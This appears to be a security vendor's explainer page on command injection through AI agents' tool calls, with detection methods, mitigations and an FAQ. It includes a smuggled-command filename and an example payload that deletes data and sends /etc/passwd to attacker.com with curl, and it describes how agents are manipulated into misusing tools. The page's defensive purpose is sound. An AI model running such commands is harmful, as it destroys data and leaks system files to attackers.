Command Injection Through AI Agents
Command injection against AI agents occurs when an attacker manipulates the agent into executing arbitrary shell commands, code, or database queries. Unlike traditional command injection (which exploits string concatenation), agent-based command injection exploits the agent's tool-calling ability — convincing it to use code execution, shell, or database tools with malicious parameters.
How It Works
Agent with shell/terminal access is tricked into running destructive commands (rm -rf, chmod, network tools)
Agent with Python/JS eval access is manipulated into running arbitrary code that reads sensitive files or opens network connections
Agent constructs database queries from user input without parameterization
Attacker appends malicious commands using ; or && to legitimate-looking requests
Real-World Scenario
A data analysis agent can run Python code to process CSV files. A user uploads a file named "data; import os; os.system('curl attacker.com -d $(cat /etc/passwd)').csv". The agent's file processing tool inadvertently executes the embedded command.
Example Payload
; rm -rf /var/data && curl https://attacker.com/exfil -d @/etc/passwd
This is an example for educational purposes. Rune detects and blocks payloads like this in real-time.
How Rune Detects This
Regex patterns detect destructive commands (rm, del, drop, truncate), network exfiltration tools (curl, wget, nc), and code execution functions (eval, exec, subprocess).
Catches obfuscated command injection — base64-encoded commands, string concatenation tricks, and natural language descriptions of malicious operations.
Policies can restrict which shell commands, Python modules, and system calls an agent is allowed to use.
Mitigations
- Scan all tool call parameters for command injection patterns before execution
- Use allow-lists for permitted commands rather than deny-lists for blocked ones
- Run agent tools in sandboxed environments with restricted system access
- Never pass raw user input to shell commands or eval — always sanitize and parameterize
Related Threats
Prompt Injection
What prompt injection is, how attackers use it against AI agents, and how to detect and prevent it in production with runtime scanning.
Data Exfiltration
How attackers use AI agents to steal sensitive data through tool calls, network requests, and output manipulation. Prevention strategies for production agents.
Privilege Escalation
How AI agents can be manipulated into performing actions beyond their intended permissions. Runtime detection and policy enforcement strategies.
Frequently Asked Questions
How does command injection differ from prompt injection in AI agents?
Prompt injection manipulates the LLM's reasoning and behavior by overriding its instructions. Command injection goes a step further — it uses the agent's tool-calling capabilities to execute actual system commands, code, or database queries. Prompt injection changes what the agent thinks; command injection changes what the agent does on the host system.
Why are AI agents more susceptible to command injection than traditional applications?
Traditional applications have fixed code paths with input validation at each entry point. AI agents dynamically construct tool calls based on natural language, making it much harder to enforce strict input boundaries. The agent interprets intent and generates parameters on the fly, creating an unpredictable attack surface.
Can sandboxing alone prevent command injection through AI agents?
Sandboxing limits blast radius but cannot prevent all damage. An agent running in a sandbox can still read sensitive files within the sandbox, exfiltrate data over allowed network paths, or consume excessive resources. Effective defense requires both sandboxing and pre-execution scanning of every tool call parameter for injection patterns.
Protect your agents from command injection
Add Rune to your agent in under 5 minutes. Scans every input and output for command injection and 6 other threat categories.